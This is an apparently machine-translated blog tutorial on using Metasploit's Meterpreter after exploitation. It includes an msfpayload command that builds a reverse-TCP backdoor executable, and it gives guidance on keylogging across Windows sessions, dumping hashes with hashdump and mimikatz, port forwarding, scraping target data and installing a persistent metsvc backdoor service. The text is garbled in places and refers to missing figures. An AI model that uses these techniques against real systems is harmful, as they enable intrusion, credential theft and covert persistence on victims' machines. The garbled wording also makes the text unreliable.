DM_ · 2014/06/10 o
0 x01 background
As a post-penetration module, Meterpreter has many types, and commands are composed of core commands and extended library commands, which greatly enrich the attack mode. It should be noted that Meterpreter will send the code of the second stage and meterpreter server DLL after the vulnerability is successfully exploited, so there are often no executable commands in the case of network instability, or the lack of commands is found after the session establishment and execution of help. This often happens when you connect to a VPN and then use psexec and bind_TCP on your Intranet. Don’t worry about trying again after you’re done. Just have a cup of tea.
0x02 Common Type
reverse_tcp
path : payload/windows/meterpreter/reverse_tcp
Msfpayload Windows/meterpreter/reverse_tcp LHOST = 192.168.1.130 LPORT = 8080 X > ~ / Desktop/backdoor. ExeCopy the code
Connect the shell backwards and it is very stable to use. LHOST needs to be set.
bind_tcp
path : payload/windows/meterpreter/bind_tcp
Forward connection shell is often used on the Intranet because it cannot connect to the attack machine when the Intranet crosses network segments and does not need to set LHOST.
reverse_http/https
path:payload/windows/meterpreter/reverse_http/https
HTTP/HTTPS reverse connection, in the case of slow network speed is unstable, if you see HTTPS on a blog, you can change the listening port to 443.
0x03 Basic Command
Commonly used with
Background Load /use modules of the current session to switch to a channel migrate process run To execute an existing module, type run and press TAB twice to list all existing scripts, such as Autoroute,hashdump,arp_scanner,multi_meter_inject etc. Resource: Executes an existing RC script.Copy the code0x04 Introduction to Common Extension libraries
Meterpreter has many extension libraries as well as basic commands. Load /use is followed by help to see instructions for this module.
stdapi command
Documents related to
Stdapi has commands for file reading and writing, uploading and downloading, directory switching, screenshots, cameras, keyloggers, and system related commands. Common, of course, are file manipulation and network related commands. I usually use upload and Download to upload and download files. Note that in Meterpreter you can also switch directories and edit files. So you don’t have to run a shell and write with echo.
When using the edit command, note that you are editing an existing file. Edit cannot create a new file. Vi editing is invoked after you enter the edit + file.
Network related
Network commands list IP information (ipconfig), show modifying the routing table (route), and port forwarding (portfwd). Such as portfwd:
After the rule is established, the local port 3344 can be connected so that the remote port 3389 can be forwarded.
Keyboard monitor
Note the concept of Windows session Windows. The Windows desktop is divided into sessions to facilitate interaction with Windows. Session 0 represents the console and session 1,2 represents the remote desktop. So to intercept keyboard input you have to do it in 0. Try using GetDesktop to view or grab an image. Otherwise, use setDesktop to switch.
If not, switch to The Explorer. Exe process so that you can also listen for keyboard input data after the remote desktop is connected.
mimikatz
I’m not going to go into this, but the hash can be stored in the database for later use. I wonder if there is a quick way to use a third-party tool to grab the hash/ plaintext and store it in the database.
This is because my user doesn’t have a password.
sniffer
I just don’t know if I can put the package victim on, and then later down, to be the actual combat certificate.
0x05 Using custom Scripts
The scripts can be RC scripts or Ruby scripts, and Metasploit already has many custom scripts. Such as arp_scanner,hashdump. These scripts are written in Ruby, so they’re handy for later customization. Here’s a common scraper script, which collects common information from the target machine and then downloads it locally. This script is recommended because it is a good process. You can add custom commands and so on.
/.msf4/logs/ saves all the logs required by the script, but not just this one. Also, the MSF4 folder contains other things, such as typed commands and logs of the MSF process. Scraper script will save result in /. Msf4 / logs/scripts/Scraper.
0x06 Persistent Backdoor
Metsvc is started by a service, but the service name is Meterpreter. The script code is shown in the figure below.
Here you need to upload three files and install the service with metsvc.exe. I wonder if the service name can be reached by modifying metsvc.exe. The installation process and the reconnection process are simple
Use the Windows/metsvC_bind_TCP payload for the next connection.
0 x07 afterword.
Meterpreter provides many scripts for attacking or gathering information, as well as many apis (see official documentation for details) and extensions. To the extent that you understand Ruby code, being able to modify existing scripts or write your own based on the target environment and current situation can greatly improve efficiency and achieve the desired results.